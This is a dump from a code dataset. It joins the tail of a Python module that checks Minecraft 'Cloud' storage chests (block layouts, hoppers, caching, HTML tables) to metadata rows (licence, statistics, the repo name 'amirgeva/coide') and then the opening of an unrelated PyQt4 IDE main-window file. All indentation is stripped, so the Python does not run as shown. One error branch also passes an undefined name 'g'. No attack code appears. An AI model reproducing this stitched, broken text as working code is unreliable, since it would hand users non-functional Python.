return 'Block at {} {} {} should be a redstone torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(3, -8, 1): 1 if z % 2 == 0 else 2, # west / east
(2, -7, 1): 3, # north
(4, -6, 1): 2 if z % 2 == 0 else 1, # east / west
(4, -6, 2): 3, # north
(4, -5, 1): 1 if z % 2 == 0 else 2, # west / east
(4, -5, 3): 4, # south
(7, -5, 3): 3, # north
(1, -4, 2): 4, # south
(1, -3, 3): 3, # north
(1, -1, 4): 4, # south
(5, -1, 1): 2 if z % 2 == 0 else 1, # east / west
(3, 0, 3): 4 # south
}
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != block['damage']:
return 'Redstone torch at {} {} {} attached to the block {}, should be attached to the block {}.'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']], TORCH_FACINGS[known_facings[layer_x, layer_y, layer_z]])
else:
return 'Facing check for redstone torch at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'W':
# back wall
if z == corridor_length - 1 or z == corridor_length - 2 and z % 2 == 0:
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = {
0: 'stone',
1: 'granite',
2: 'polished granite',
3: 'diorite',
4: 'polished diorite',
5: 'andesite',
6: 'polished andesite'
}[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
elif block_symbol == 'X':
# overflow hopper chain pointing down
if layer_y < -7 and y < 6 and (z == 4 or z == 5) or layer_y > -7 and y > 1 and (z == 0 or z == 1):
if block['id'] == 'minecraft:hopper':
if block['damage'] != 0: # down
return 'Overflow hopper at {} {} {} should be pointing down, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
elif block['id'] == 'minecraft:air':
pass # also allow air because some overflow hopper chains don't start on the first floor
else:
return 'Block at {} {} {} should be air or a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == '^':
# hopper facing outward
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != (5 if z % 2 == 0 else 4): # east / west
return 'Hopper at {} {} {} should be pointing {}, is {}.'.format(exact_x, exact_y, exact_z, 'east' if z % 2 == 0 else 'west', HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -5, 3),
(6, -5, 3),
(7, -4, 3),
(5, -3, 2),
(6, -3, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'c':
# crafting table
if layer_y == -7 and (y == 6 or z < 4 or z < 6 and layer_z > 1):
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
else:
if block['id'] != 'minecraft:crafting_table':
return 'Block at {} {} {} should be a crafting table, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'i':
# torch attached to the top of a block
if block['id'] != 'minecraft:torch':
return 'Block at {} {} {} should be a torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 5: # attached to the block below
return 'Torch at {} {} {} should be attached to the block below, is attached to the block {}'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']])
elif block_symbol == 'p':
# oak planks
if layer_y == -8 and (y == 6 or z < 4 or z < 6 and layer_z > 1):
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
else:
if block['id'] != 'minecraft:planks':
return 'Block at {} {} {} should be oak planks, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
pass #TODO check material
elif block_symbol == 'r':
# redstone dust
if block['id'] != 'minecraft:redstone_wire':
return 'Block at {} {} {} should be redstone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 's':
# stone
if block['id'] != 'minecraft:stone':
if exact_y < 5:
if block['id'] != 'minecraft:bedrock':
return 'Block at {} {} {} should be stone or bedrock, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
elif block_symbol == 't':
# redstone torch attached to the top of a block
if block['id'] not in ('minecraft:unlit_redstone_torch', 'minecraft:redstone_torch'):
return 'Block at {} {} {} should be a redstone torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 5: # attached to the block below
return 'Redstone torch at {} {} {} should be attached to the block below, is attached to the block {}'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']])
elif block_symbol == 'v':
# hopper facing inwards
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != (4 if z % 2 == 0 else 5): # west / east
return 'Hopper at {} {} {} should be pointing {}, is {}.'.format(exact_x, exact_y, exact_z, 'west' if z % 2 == 0 else 'east', HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -7, 4),
(4, -7, 4),
(2, -6, 3)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'x':
# hopper facing down
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0: # down
return 'Hopper at {} {} {} should be pointing down, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(5, -1, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '~':
# hopper chain
if block['id'] == 'minecraft:hopper':
pass #TODO check facing
pass #TODO check alignment
elif block['id'] == 'minecraft:air':
pass #TODO check alignment
else:
return 'Block at {} {} {} should be a hopper or air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
pass #TODO check hopper chain integrity
else:
return 'Not yet implemented: block at {} {} {} should be {}.'.format(exact_x, exact_y, exact_z, block_symbol)
# error check: items in storage chests but not in access chest
access_chest_fill_level = alltheitems.item.comparator_signal(north_half, south_half)
bottom_dropper_fill_level = alltheitems.item.comparator_signal(block_at(*layer_coords(5, -7, 3), chunk_cache=chunk_cache))
if access_chest_fill_level < 2 and bottom_dropper_fill_level > 2:
return 'Access chest is {}empty but there are items stuck in the storage dropper at {} {} {}.'.format('' if access_chest_fill_level == 0 else 'almost ', *layer_coords(5, -7, 3))
if durability and has_smart_chest:
# error check: damaged or enchanted tools in storage chests
storage_containers = set(CONTAINERS) - {(5, 0, 2), (5, 0, 3)}
for container in storage_containers:
for slot in block_at(*layer_coords(*container), chunk_cache=chunk_cache)['tileEntity']['Items']:
if slot.get('Damage', 0) > 0:
return 'Item in storage container at {} {} {} is damaged.'.format(*layer_coords(*container))
if len(slot.get('tag', {}).get('ench', [])) > 0:
return 'Item in storage container at {} {} {} is enchanted.'.format(*layer_coords(*container))
def chest_state(coords, item_stub, corridor_length, item_name=None, pre_sorter=None, *, items_data=None, block_at=alltheitems.world.World().block_at, document_root=ati.document_root, chunk_cache=None, cache=None, allow_cache=True):
if items_data is None:
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
if chunk_cache is None:
chunk_cache = {}
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item = alltheitems.item.Item(item_stub, items_data=items_data)
if item_name is None:
item_name = item.info()['name']
state = None, 'This SmartChest is in perfect state.', None
x, y, z = coords
# determine the base coordinate, i.e. the position of the north half of the access chest
if z % 2 == 0:
# left wall
base_x = 15 * x + 2
else:
# right wall
base_x = 15 * x - 3
base_y = 73 - 10 * y
base_z = 28 + 10 * y + 4 * (z // 2)
def layer_coords(layer_x, layer_y, layer_z):
if z % 2 == 0:
# left wall
exact_x = base_x + 5 - layer_x
else:
# right wall
exact_x = base_x - 5 + layer_x
exact_y = base_y + layer_y
exact_z = base_z + 3 - layer_z
return exact_x, exact_y, exact_z
# does the access chest exist?
exists = False
north_half = block_at(base_x, base_y, base_z, chunk_cache=chunk_cache)
south_half = block_at(base_x, base_y, base_z + 1, chunk_cache=chunk_cache)
if north_half['id'] != 'minecraft:chest' and south_half['id'] != 'minecraft:chest':
state = 'gray', 'Access chest does not exist.', None
elif north_half['id'] != 'minecraft:chest':
state = 'gray', 'North half of access chest does not exist.', None
elif south_half['id'] != 'minecraft:chest':
state = 'gray', 'South half of access chest does not exist.', None
else:
exists = True
# does it have a SmartChest?
has_smart_chest = False
missing_droppers = set()
for dropper_y in range(base_y - 7, base_y):
dropper = block_at(base_x, dropper_y, base_z, chunk_cache=chunk_cache)
if dropper['id'] != 'minecraft:dropper':
missing_droppers.add(dropper_y)
if len(missing_droppers) == 7:
if state[0] is None:
state = 'orange', 'SmartChest droppers do not exist.', None
elif len(missing_droppers) > 1:
if state[0] is None:
state = 'orange', 'SmartChest droppers at y={} do not exist.'.format(', y='.join(str(dropper) for dropper in missing_droppers)), None
elif len(missing_droppers) == 1:
if state[0] is None:
state = 'orange', 'SmartChest dropper at y={} does not exist, is {}.'.format(next(iter(missing_droppers)), block_at(base_x, dropper_y, base_z)['id']), None
else:
has_smart_chest = True
# is it stackable?
stackable = item.info().get('stackable', True)
if not stackable and state[0] is None:
state = 'cyan', "This SmartChest is in perfect state (but the item is not stackable, so it can't be sorted).", None
# does it have a durability bar?
durability = 'durability' in item.info()
# does it have a sorter?
has_sorter = False
if item == 'minecraft:crafting_table' or stackable and item.max_stack_size < 64:
filler_item = alltheitems.item.Item('minecraft:crafting_table', items_data=items_data)
else:
filler_item = alltheitems.item.Item('minecraft:ender_pearl', items_data=items_data)
sorting_hopper = block_at(base_x - 2 if z % 2 == 0 else base_x + 2, base_y - 3, base_z, chunk_cache=chunk_cache)
if sorting_hopper['id'] != 'minecraft:hopper':
if state[0] is None:
state = 'yellow', 'Sorting hopper does not exist, is {}.'.format(sorting_hopper['id']), None
else:
for slot in sorting_hopper['tileEntity']['Items']:
if slot['Slot'] == 0 and stackable and not item.matches_slot(slot) and filler_item.matches_slot(slot):
if state[0] is None or state[0] == 'cyan':
state = 'yellow', 'Sorting hopper is full of {}, but the sorted item is stackable, so the first slot should contain the item.'.format(filler_item.link_text()), None
break
else:
has_sorter = True
# does it have an overflow?
has_overflow = False
missing_overflow_hoppers = set()
for overflow_x in range(base_x + 3 if z % 2 == 0 else base_x - 3, base_x + 6 if z % 2 == 0 else base_x - 6, 1 if z % 2 == 0 else -1):
overflow_hopper = block_at(overflow_x, base_y - 7, base_z - 1, chunk_cache=chunk_cache)
if overflow_hopper['id'] != 'minecraft:hopper':
missing_overflow_hoppers.add(overflow_x)
if len(missing_overflow_hoppers) == 0:
has_overflow = True
# state determined, check for errors
if coords == (1, 1, 0): # Ender pearls
message = global_error_checks(chunk_cache=chunk_cache, block_at=block_at)
if message is not None:
return 'red', message, None
cache_path = ati.cache_root / 'cloud-chests.json'
if cache is None:
if cache_path.exists():
with cache_path.open() as cache_f:
cache = json.load(cache_f)
else:
cache = {}
max_age = datetime.timedelta(hours=1, minutes=random.randrange(0, 60)) # use a random value between 1 and 2 hours for the cache expiration
if allow_cache and str(y) in cache and str(x) in cache[str(y)] and str(z) in cache[str(y)][str(x)] and cache[str(y)][str(x)][str(z)]['errorMessage'] is None and datetime.datetime.strptime(cache[str(y)][str(x)][str(z)]['timestamp'], '%Y-%m-%d %H:%M:%S') > datetime.datetime.utcnow() - max_age:
message = cache[str(y)][str(x)][str(z)]['errorMessage']
pass # cached check results are recent enough
else:
# cached check results are too old, recheck
message = chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, pre_sorter, layer_coords, block_at, items_data, chunk_cache, document_root)
if ati.cache_root.exists():
if str(y) not in cache:
cache[str(y)] = {}
if str(x) not in cache[str(y)]:
cache[str(y)][str(x)] = {}
cache[str(y)][str(x)][str(z)] = {
'errorMessage': message,
'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
}
with cache_path.open('w') as cache_f:
json.dump(cache, cache_f, sort_keys=True, indent=4)
if message is not None:
return 'red', message, None
# no errors, determine fill level
if state[0] in (None, 'cyan', 'orange', 'yellow'):
try:
containers = CONTAINERS if state[0] in (None, 'cyan') else [ # layer coords of the access chest
(5, 0, 2),
(5, 0, 3)
]
total_items = sum(max(0, sum(slot['Count'] for slot in block_at(*layer_coords(*container), chunk_cache=chunk_cache)['tileEntity']['Items'] if slot.get('Damage', 0) == 0 or not durability) - (4 * item.max_stack_size if container == (5, -7, 3) else 0)) for container in containers) # Don't count the 4 stacks of items that are stuck in the bottom dropper. Don't count damaged tools.
max_slots = sum(alltheitems.item.NUM_SLOTS[block_at(*layer_coords(*container), chunk_cache=chunk_cache)['id']] for container in containers) - (0 if state[0] == 'orange' else 4)
return state[0], state[1], FillLevel(item.max_stack_size, total_items, max_slots, is_smart_chest=state[0] in (None, 'cyan'))
except:
# something went wrong determining fill level, re-check errors
message = chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, g, layer_coords, block_at, items_data, chunk_cache, document_root)
if ati.cache_root.exists():
if str(y) not in cache:
cache[str(y)] = {}
if str(x) not in cache[str(y)]:
cache[str(y)][str(x)] = {}
cache[str(y)][str(x)][str(z)] = {
'errorMessage': message,
'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
}
with cache_path.open('w') as cache_f:
json.dump(cache, cache_f, sort_keys=True, indent=4)
if message is None:
raise
else:
return 'red', message, None
return state
def cell_from_chest(coords, item_stub, corridor_length, item_name=None, pre_sorter=None, *, chunk_cache=None, items_data=None, colors_to_explain=None, cache=None, allow_cache=True):
color, state_message, fill_level = chest_state(coords, item_stub, corridor_length, item_name, pre_sorter, items_data=items_data, chunk_cache=chunk_cache, cache=cache, allow_cache=allow_cache)
if colors_to_explain is not None:
colors_to_explain.add(color)
if fill_level is None or fill_level.is_full():
return '<td style="background-color: {};">{}</td>'.format(HTML_COLORS[color], alltheitems.item.Item(item_stub, items_data=items_data).image())
else:
return '<td style="background-color: {};">{}<div class="durability"><div style="background-color: #f0f; width: {}px;"></div></div></td>'.format(HTML_COLORS[color], alltheitems.item.Item(item_stub, items_data=items_data).image(), 0 if fill_level.is_empty() else 2 + int(fill_level.fraction * 13) * 2)
def index(allow_cache=True):
yield ati.header(title='Cloud')
def body():
yield '<p>The <a href="//wiki.{host}/Cloud">Cloud</a> is the public item storage on <a href="//{host}/">Wurstmineberg</a>, consisting of 6 underground floors with <a href="//wiki.{host}/SmartChest">SmartChests</a> in them.</p>'.format(host=ati.host)
yield """<style type="text/css">
.item-table td {
box-sizing: content-box;
height: 32px;
width: 32px;
position: relative;
}
.item-table .left-sep {
border-left: 1px solid gray;
}
.durability {
z-index: 1;
}
</style>"""
chunk_cache = {}
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
cache_path = ati.cache_root / 'cloud-chests.json'
if cache_path.exists():
try:
with cache_path.open() as cache_f:
cache = json.load(cache_f)
except ValueError:
# cache JSON is corrupted, probably because of a full disk, try without cache
cache_path.unlink()
cache = None
else:
cache = None
colors_to_explain = set()
floors = {}
for x, corridor, y, floor, z, chest in chest_iter():
if y not in floors:
floors[y] = floor
for y, floor in sorted(floors.items(), key=lambda tup: tup[0]):
def cell(coords, item_stub, corridor):
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item_name = None
pre_sorter = None
else:
item_stub = item_stub.copy()
if 'name' in item_stub:
item_name = item_stub['name']
del item_stub['name']
else:
item_name = None
if 'sorter' in item_stub:
pre_sorter = item_stub['sorter']
del item_stub['sorter']
else:
pre_sorter = None
return cell_from_chest(coords, item_stub, len(corridor), item_name, pre_sorter, chunk_cache=chunk_cache, colors_to_explain=colors_to_explain, items_data=items_data, cache=cache, allow_cache=allow_cache)
yield bottle.template("""
%import itertools
<h2 id="floor{{y}}">{{y}}{{ordinal(y)}} floor (y={{73 - 10 * y}})</h2>
<table class="item-table" style="margin-left: auto; margin-right: auto;">
%for x in range(-3, 4):
%if x > -3:
<colgroup class="left-sep">
<col />
<col />
</colgroup>
%else:
<colgroup>
<col />
<col />
</colgroup>
%end
%end
<tbody>
%for z_left, z_right in zip(itertools.count(step=2), itertools.count(start=1, step=2)):
%found = False
<tr>
%for x in range(-3, 4):
%if str(x) not in floor:
<td></td>
<td></td>
%continue
%end
%corridor = floor[str(x)]
%if len(corridor) > z_right:
{{!cell((x, y, z_right), corridor[z_right], corridor)}}
%else:
<td></td>
%end
%if len(corridor) > z_left:
{{!cell((x, y, z_left), corridor[z_left], corridor)}}
%found = True
%else:
<td></td>
%end
%end
</tr>
%if not found:
%break
%end
%end
</tbody>
</table>
""", ordinal=alltheitems.util.ordinal, cell=cell, floor=floor, y=y)
color_explanations = collections.OrderedDict([
('red', '<p>A red background means that there is something wrong with the chest. See the item info page for details.</p>'),
('gray', "<p>A gray background means that the chest hasn't been built yet or is still located somewhere else.</p>"),
('orange', "<p>An orange background means that the chest doesn't have a SmartChest yet. It can only store 54 stacks.</p>"),
('yellow', "<p>A yellow background means that the chest doesn't have a sorter yet.</p>"),
('cyan', '<p>A cyan background means that the chest has no sorter because it stores an unstackable item. These items should not be automatically <a href="//wiki.wurstmineberg.de/Soup#Cloud">sent</a> to the Cloud.</p>'),
(None, '<p>A white background means that everything is okay: the chest has a SmartChest, a sorter, and overflow protection.</p>')
])
for chest_color in sorted(colors_to_explain, key=list(color_explanations.keys()).index):
if chest_color is not None or len(colors_to_explain) > 1:
yield color_explanations[chest_color]
yield from ati.html_exceptions(body())
yield ati.footer(linkify_headers=True)
def todo():
yield ati.header(title='Cloud by priority')
def body():
yield """<style type="text/css">
.todo-table td {
text-align: left;
vertical-align: middle !important;
}
.todo-table .coord {
width: 3em;
text-align: right;
}
.todo-table .item-image {
box-sizing: content-box;
width: 32px;
}
.todo-table .item-name {
width: 24em;
}
</style>"""
headers = collections.OrderedDict([
('red', 'Build errors'),
('gray', 'Missing chests'),
('orange', 'Missing SmartChests'),
('yellow', 'Missing sorters'),
('cyan', 'Empty SmartChests (unstackable)'),
('white', 'Empty SmartChests (stackable)'),
('cyan2', 'Missing items (unstackable)'),
('white2', 'Missing items (stackable)')
])
header_indexes = {color: i for i, color in enumerate(headers.keys())}
def priority(pair):
coords, state = pair
x, y, z = coords
color, _, fill_level, _ = state
return header_indexes[color], None if fill_level is None else fill_level.fraction * (-1 if color == 'orange' else 1), y * (-1 if color == 'orange' else 1), x if y % 2 == 0 else -x, z
chunk_cache = {}
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
cache_path = ati.cache_root / 'cloud-chests.json'
if cache_path.exists():
try:
with cache_path.open() as cache_f:
cache = json.load(cache_f)
except ValueError:
# cache JSON is corrupted, probably because of a full disk, try without cache
cache_path.unlink()
cache = None
else:
cache = None
states = {}
current_color = None
for x, corridor, y, _, z, item_stub in chest_iter():
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item_name = None
pre_sorter = None
else:
item_stub = item_stub.copy()
if 'name' in item_stub:
item_name = item_stub['name']
del item_stub['name']
else:
item_name = None
if 'sorter' in item_stub:
pre_sorter = item_stub['sorter']
del item_stub['sorter']
else:
pre_sorter = None
color, state_message, fill_level = chest_state((x, y, z), item_stub, len(corridor), item_name, pre_sorter, items_data=items_data, chunk_cache=chunk_cache, cache=cache)
if color is None:
color = 'white'
if color in ('cyan', 'white') and not fill_level.is_empty():
color += '2'
if fill_level is None or not fill_level.is_full() or color not in ('cyan', 'white', 'cyan2', 'white2'):
states[x, y, z] = color, state_message, fill_level, alltheitems.item.Item(item_stub, items_data=items_data)
for coords, state in sorted(states.items(), key=priority):
x, y, z = coords
color, state_message, fill_level, item = state
if color != current_color:
if current_color is not None:
yield '</tbody></table>'
yield bottle.template('<h2 id="{{color}}">{{header}}</h2>', color=color, header=headers[color])
yield '<table class="todo-table table table-responsive"><thead><tr><th class="coord">X</th><th class="coord">Y</th><th class="coord">Z</th><th class="item-image"> </th><th class="item-name">Item</th><th>{}</th></tr></thead><tbody>'.format('Fill Level' if color in ('cyan', 'white', 'cyan2', 'white2') else 'Info')
current_color = color
yield bottle.template("""
<tr>
<td class="coord">{{x}}</td>
<td class="coord">{{y}}</td>
<td class="coord">{{z}}</td>
<td class="item-image">{{!item.image()}}</td>
<td class="item-name">{{!item.link_text()}}</td>
<td style="background-color: {{color}}">{{!fill_level if color in ('#0ff', '#fff') else state_message}}</td>
</tr>
""", x=x, y=y, z=z, item=item, color=HTML_COLORS[color], fill_level=fill_level, state_message=state_message)
yield '</tbody></table>'
yield from ati.html_exceptions(body())
yield ati.footer(linkify_headers=True)
|
mit
| 6,210,669,962,743,115,000
| 59.09228
| 392
| 0.481912
| false
| 3.874814
| false
| false
| false
|
amirgeva/coide
|
mainwindow.py
|
1
|
54237
|
from PyQt4 import QtCore
from PyQt4 import QtGui
import os
import re
import stat
import qutepart
from workspace import WorkSpace
import output
from consts import FileRole
from gdbwrapper import GDBWrapper
from watchestree import WatchesTree
from breakpoints import BreakpointsDB, BreakpointDialog
from properties import Properties
from functools import partial
from globals import is_src_ext
import utils
import genmake
import uis
import plugins
import dwarf
class MainWindow(QtGui.QMainWindow):
""" Main IDE Window
Contains the main code view, along with docking panes for: source files,
watches, call stack, and output
"""
LIBRARY_SCAN = "Scanning Libraries"
def __init__(self,rootDir,parent=None):
""" Initialize. rootDir indicates where data files are located """
super(MainWindow,self).__init__(parent)
s=QtCore.QSettings()
self.recent_ws=[d for d in s.value('recent_ws','').toString().split(':') if d]
self.symbolScan=s.value('symbol_scan',True).toBool()
self.setMinimumSize(QtCore.QSize(1024,768))
self.currentLine=0
self.currentFile=''
self.rootDir=rootDir
utils.setIconsDir(os.path.join(rootDir,"icons"))
self.debugger=None
self.breakpoints=BreakpointsDB()
self.findDetails=None
self.scm_mods=[]
self.setWindowIcon(utils.loadIcon('coide'))
self.setWindowTitle("Coide")
self.generateQueue=set()
self.editors={}
self.file_times={}
self.central=QtGui.QTabWidget()
self.setCentralWidget(self.central)
self.central.setTabsClosable(True)
self.central.tabCloseRequested.connect(self.closeTab)
self.central.currentChanged.connect(self.tabChanged)
self.tabOrder=[]
self.plugins=plugins.PluginsManager()
self.setupMenu()
self.setupContextMenuItems()
self.setupToolbar(rootDir)
self.showWorkspacePane()
self.showOutputPane()
self.showWatchesPane()
self.showLocalsPane()
self.showCallStackPane()
self.buildProcess=None
self.timerCall=None
self.config=s.value("config").toString()
if self.config=='':
self.config="Debug"
self.configCombo.setCurrentIndex(0 if self.config=='Debug' else 1)
self.workspaceTree.setConfig(self.config)
self.setAllFonts()
self.loadWindowSettings()
# Debugger timer that is supposed to periodically check
# if the program has stopped at a breakpoint
self.timer=QtCore.QTimer(self)
self.timer.timeout.connect(self.update)
self.runningWidget=None
self.asyncPollTimer=QtCore.QTimer(self)
self.asyncPollTimer.timeout.connect(self.pollAsync)
self.generateTimer=QtCore.QTimer()
self.generateTimer.timeout.connect(self.timer1000)
self.generateTimer.start(1000)
self.lowFreqTimer=QtCore.QTimer()
self.lowFreqTimer.timeout.connect(self.timer5000)
self.lowFreqTimer.start(5000)
#self.showStatus("Generating All Makefiles")
#self.timerCall=self.generateAllInThread
self.timerCall=None
self.paneWatches.hide()
self.paneLocals.hide()
self.paneStack.hide()
#self.sc=QtGui.QShortcut("Ctrl+F8",self)
#self.sc.activated.connect(self.prtsc)
def closeEvent(self, event):
""" Called before the application window closes
Informs sub-windows to prepare and saves window settings
to allow future sessions to look the same
"""
self.workspaceTree.onClose()
self.workspaceTree.saveTabs(self.central)
while self.central.count()>0:
if not self.closeFile():
event.ignore()
return
self.timer.stop()
self.generateTimer.stop()
if self.debugger:
self.debugger.closingApp()
settings = QtCore.QSettings()
settings.setValue("geometry", self.saveGeometry())
settings.setValue("windowState", self.saveState())
settings.sync()
self.removeTempScripts()
super(MainWindow,self).closeEvent(event)
def saveDebugWindowState(self):
"""
Save the state of the tool docks, like watches
and call stack
"""
settings = QtCore.QSettings()
settings.setValue("debugWindowState", self.saveState())
settings.sync()
def loadDebugWindowState(self):
"""
Restore previous debug windows layout
"""
settings = QtCore.QSettings()
self.restoreState(settings.value("debugWindowState").toByteArray())
def loadWindowSettings(self):
"""
Restore the window size settings from the previous session
"""
settings = QtCore.QSettings()
self.restoreGeometry(settings.value("geometry").toByteArray())
self.restoreState(settings.value("windowState").toByteArray())
self.loadTabs()
def loadTabs(self):
self.closeAllTabs()
ws=self.workspaceTree.settings()
opentabs=ws.value('opentabs','').toString()
opentabs=opentabs.split(',')
for path in opentabs:
self.openSourceFile(path)
curtab=ws.value('curtab','').toString()
if curtab:
self.setActiveSourceFile(curtab)
def setupMenu(self):
""" Creates the application main menu
The action handlers are also mapped from the toolbar icons
"""
bar=self.menuBar()
m=bar.addMenu('&File')
m.addAction(QtGui.QAction('&Initialize Workspace',self,triggered=self.initWorkspace))
m.addAction(QtGui.QAction('Open &Workspace',self,triggered=self.openWorkspace))
self.recents_menu=m.addMenu('&Recent Workspaces')
m.addAction(QtGui.QAction('&Save',self,shortcut='Ctrl+S',triggered=self.saveFile))
m.addAction(QtGui.QAction('Save &As',self,triggered=self.saveAsFile))
m.addAction(QtGui.QAction('&Close File',self,shortcut='Ctrl+F4',triggered=self.closeFile))
m.addAction(QtGui.QAction('E&xit',self,shortcut='Ctrl+Q',triggered=self.exitApp))
m=bar.addMenu('&Edit')
m.addAction(QtGui.QAction('&Copy',self,shortcut='Ctrl+C',triggered=self.onCopy))
m.addAction(QtGui.QAction('C&ut',self,shortcut='Ctrl+X',triggered=self.onCut))
m.addAction(QtGui.QAction('&Paste',self,shortcut='Ctrl+V',triggered=self.onPaste))
m.addSeparator()
m.addAction(QtGui.QAction('&Find/Replace',self,shortcut='Ctrl+F',triggered=self.onFindReplace))
m.addAction(QtGui.QAction('Find/Replace &Next',self,shortcut='F3',triggered=self.onFindNext))
m=bar.addMenu('&View')
panes=m.addMenu('Panes')
panes.addAction(QtGui.QAction('&Workspace',self,triggered=self.onViewPaneWorkspace))
panes.addAction(QtGui.QAction('&Output',self,triggered=self.onViewPaneOutput))
m.addAction(QtGui.QAction('&Next Tab',self,shortcut='Ctrl+F6',triggered=self.onViewNextTab))
m=bar.addMenu('&Build')
m.addAction(QtGui.QAction('&Build',self,shortcut='F7',triggered=self.build))
m.addAction(QtGui.QAction('&Clean',self,triggered=self.clean))
m.addAction(QtGui.QAction('&Rebuild',self,shortcut='Shift+F7',triggered=self.rebuild))
m.addAction(QtGui.QAction('&Settings',self,shortcut='Ctrl+F7',triggered=self.buildSettings))
m.addAction(QtGui.QAction('&Next Error',self,shortcut='F4',triggered=self.nextError))
m=bar.addMenu('&Debug')
m.addAction(QtGui.QAction('&Run',self,shortcut='Ctrl+F5',triggered=self.runProject))
m.addAction(QtGui.QAction('&Start/Continue Debugger',self,shortcut='F5',triggered=self.startDebug))
ma=m.addMenu('Actions')
ma.addAction(QtGui.QAction('&Step',self,shortcut='F11',triggered=self.actStep))
ma.addAction(QtGui.QAction('&Next',self,shortcut='F10',triggered=self.actNext))
ma.addAction(QtGui.QAction('Step &Out',self,shortcut='Shift+F11',triggered=self.actOut))
ma.addAction(QtGui.QAction('&Break',self,shortcut='Ctrl+C',triggered=self.actBreak))
ma.addAction(QtGui.QAction('Sto&p',self,shortcut='Shift+F5',triggered=self.actStop))
ma=m.addMenu('&Breakpoints')
ma.addAction(QtGui.QAction('&Clear',self,triggered=self.clearBreakpoints))
m=bar.addMenu('&Settings')
m.addAction(QtGui.QAction('&General',self,triggered=self.settingsGeneral))
